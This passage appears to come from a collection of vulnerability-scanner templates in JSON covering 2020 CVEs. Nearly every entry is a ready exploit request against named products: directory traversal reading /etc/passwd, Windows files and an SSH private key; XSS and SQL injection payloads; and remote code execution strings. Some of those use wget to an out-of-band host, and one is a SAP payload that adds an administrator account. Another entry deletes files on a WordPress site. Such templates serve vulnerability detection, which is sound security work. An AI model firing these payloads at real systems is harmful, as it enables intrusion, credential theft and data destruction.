Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"raw":["GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')","status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"],"condition":"or"}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","<strong>IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"],"body":"type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site 